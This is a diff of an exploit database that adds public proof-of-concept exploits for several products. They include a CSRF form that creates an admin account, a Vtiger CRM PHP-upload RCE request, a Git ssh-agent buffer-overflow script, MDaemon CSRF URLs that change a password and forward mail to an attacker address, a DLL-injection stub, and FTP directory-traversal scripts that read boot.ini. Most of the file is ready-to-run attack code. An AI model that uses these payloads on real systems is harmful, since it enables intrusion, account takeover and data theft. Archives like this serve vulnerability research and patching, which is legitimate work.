<input type="hidden" name="contact_alias" value="Testingus" />
<input type="hidden" name="contact_name" value="Fullio" />
<input type="hidden" name="contact_email" value="test@test.tld" />
<input type="hidden" name="contact_pager" value="" />
<input type="hidden" name="contact_template_id" value="" />
<input type="hidden" name="contact_enable_notifications[contact_enable_notifications]" value="2" />
<input type="hidden" name="timeperiod_tp_id" value="" />
<input type="hidden" name="timeperiod_tp_id2" value="" />
<input type="hidden" name="contact_oreon[contact_oreon]" value="1" />
<input type="hidden" name="contact_passwd" value="123123" />
<input type="hidden" name="contact_passwd2" value="123123" />
<input type="hidden" name="contact_lang" value="en_US" />
<input type="hidden" name="contact_admin[contact_admin]" value="1" />
<input type="hidden" name="contact_autologin_key" value="" />
<input type="hidden" name="contact_auth_type" value="local" />
<input type="hidden" name="contact_acl_groups[]" value="31" />
<input type="hidden" name="contact_acl_groups[]" value="32" />
<input type="hidden" name="contact_acl_groups[]" value="34" />
<input type="hidden" name="contact_address1" value="Neverland" />
<input type="hidden" name="contact_address2" value="" />
<input type="hidden" name="contact_address3" value="101" />
<input type="hidden" name="contact_address4" value="" />
<input type="hidden" name="contact_address5" value="" />
<input type="hidden" name="contact_address6" value="" />
<input type="hidden" name="contact_activate[contact_activate]" value="1" />
<input type="hidden" name="contact_comment" value="comment-vuln-xss-t00t" />
<input type="hidden" name="action[action]" value="1" />
<input type="hidden" name="submitA" value="Save" />
<input type="hidden" name="contact_register" value="1" />
<input type="hidden" name="contact_id" value="" />
<input type="hidden" name="o" value="a" />
<input type="hidden" name="initialValues" value="a:0:{}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

84
platforms/php/webapps/38345.txt Executable file
View file

@ -0,0 +1,84 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== Description ===
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== PoC ===
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040
-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"
[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg
<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
The resulting PHP file can then be accessed at
[Vtiger URL]/test/logo/2.php
- --
Benjamin Daniel MUSSLER
Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)
iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----

147
platforms/windows/dos/38336.py Executable file
View file

@ -0,0 +1,147 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt
Vendor:
================================
git-scm.com
Product:
================================
Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=========================
Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is
start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if
the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible.
Fault module seems to be msys-1.0.dll
File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46
Stack trace:
-------------
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B
Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOOOOOOOOOM! we control EIP.
Quick GDB dump...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax 0xffffffff -1
ecx 0x680a4c3a 1745505338
edx 0x680a4c3a 1745505338
ebx 0x28f90c 2685196
esp 0x28f884 0x28f884
ebp 0x41414141 0x41414141
esi 0x28f8fc 2685180
edi 0x2660 9824
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43
POC code(s):
===============
Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed
to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP.
Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it!
'''
import struct,os,shutil
#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#======================================================
file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "
x=open(file,"w")
eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")
print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "====================================\n"
'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 10, 2015
Sept 26, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Description:
==========================================================
Vulnerable Product: [+] Git-1.9.5-preview20150319.exe
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
'''

40
platforms/windows/dos/38344.txt Executable file
View file

@ -0,0 +1,40 @@
# Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions
Bypass Vulnerability
# Date: 09/28/2015
# Author: Reigning Shells, based off PoC published by Zero Day Initiative
# Vendor Homepage: adobe.com
# Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before
11.0.11 on Windows and OS X are vulnerable.
# Tested on: Adobe Acrobat 11.0.10 on Windows 7
# CVE : CVE-2015-3073
This vulnerability allows remote attackers to bypass API restrictions on
vulnerable installations of Adobe Reader. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page
or open a malicious file.
The specific flaw exists within AFParseDate. By creating a specially
crafted PDF with specific JavaScript instructions, it is possible to bypass
the Javascript API restrictions. A remote attacker could exploit this
vulnerability to execute arbitrary code.
Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on
Windows and OS X are vulnerable.
Notes:
The code assumes you attached a DLL named exploit.txt to the PDF document
to get around attachment security restrictions.
Acrobat will execute updaternotifications.dll if it's in the same directory
as the Acrobat executable or the same directory as the document being
opened.
Credit for discovery and the initial POC that illustrates code being
executed in the privileged context (launching a URL) goes to the Zero Day
Initiative.
Code:
https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip

30
platforms/windows/dos/38348.txt Executable file
View file

@ -0,0 +1,30 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=504
The latest version of the Vector.<primitive> length check in Flash 18,0,0,232 is not robust against memory corruptions such as heap overflows. While its no longer possible to obviously bypass the length check theres still unguarded data in the object which could be corrupted to serve as a useful primitive.
To better describe this currently the Vector primitive object (at least on 32 bit) looks something like:
| unguarded length | unguarded capacity | xored length | ... | data |
The problem arises because the capacity is not guarded by the xor, and its before the xored length which is guarded. As we know the unguarded length value then if we have a suitable memory corruption vulnerability we could corrupt only the length and the capacity fields leaving the xored length alone. Of course wed need to corrupt the length back to the same value (otherwise the length guard check would fail). If we set the capacity to be greater than that originally allocated then when a call is made to set the length (using the length Vector property) the runtime will assume the allocation is larger than it is and extend the vector over the end of the original allocation.
This in itself is not enough to serve as a useful primitive as extending the vector also 0s any data afterwards so its not an information leak. However weve now got a vector which aliases some other part of the heap. If for example something else was allocated immediately after the vector which we can influence then itd be possible to write data to that and read it out from the vector, and vice versa. Also depending on the heap type it might be possible to reconstruct heap headers, but it probably isnt on Windows. As vector objects are now on the system heap its a lot harder to exploit. Its likely that an attacker would need to utilize browser specific heap allocations rather than another flash allocation.
One way of fixing this, at least against buffer overflows, would be to move the xored length before the capacity. In this case the act of overflowing the capacity value would corrupt the guard length leading to the check failure when setting the new length to exceed the existing capacity. This wouldnt do anything against a heap relative overwrite or a buffer underflow. In that case you could also apply the guard to the capacity field as well. If Vectors are completely moved out from the heap with other objects, as planned, exploiting this would probably be very difficult.
On a related note, its still possible to read the length of the vector without triggering the guard check. The length is whatever the unguarded length is set to. This could be used as a way of checking which vector objects have been corrupted by an overflow.
Ive provided a simple example which allocates a 16k UInt vector. Using a debugger you can modify the capacity then press a key to show that the process doesnt crash (at least doesnt crash due to a length corruption). The following instructions are for IE11 with 32 bit tabs (the default even on x64 builds).
1. Load the swf file into IE
2. Attach WinDBG to the IE tab process
3. Search for the data pattern to find the vector using the command “s 0 L?10000000 78 56 34 12 f0 de bc 9a 00 00 00 00”. There should only be one hit.
4. Modify the capacity using the command “ed <address>-0xC 5000” replacing <address> with that found in step 3. Also look at <address>+0n64*0n1024 which will should show other data on the heap.
5. Resume execution in the debugger.
6. Select the flash object in the browser and press the = key, you should see a trace message printing the new length.
7. If you return to the debugger and dump the data at <addresss>+0n64*0n1024 youll find the memory has been zeroed. Also at <addresss>+0n64*0n1024+3C you should find that the value 0x88888888 has been written to existing allocated memory.
The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10”
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38348.zip

9
platforms/windows/remote/38325.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58076/info
MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n
http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com

19
platforms/windows/remote/38330.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/58131/info
Photodex ProShow Producer is prone to multiple arbitrary code-execution vulnerabilities.
An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a customized library file from application path which contains a specially crafted code. Successful exploits will compromise the application in the context of the currently logged-in user.
Photodex ProShow Producer 5.0.3297 is vulnerable; other versions may also be affected.
// wine gcc -Wall -shared inject.c -o ddraw.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
MessageBox(0,"DLL Injection","DLL Injection", 0);
}
return TRUE;
}

18
platforms/windows/remote/38340.py Executable file
View file

@ -0,0 +1,18 @@
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

18
platforms/windows/remote/38341.py Executable file
View file

@ -0,0 +1,18 @@
#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"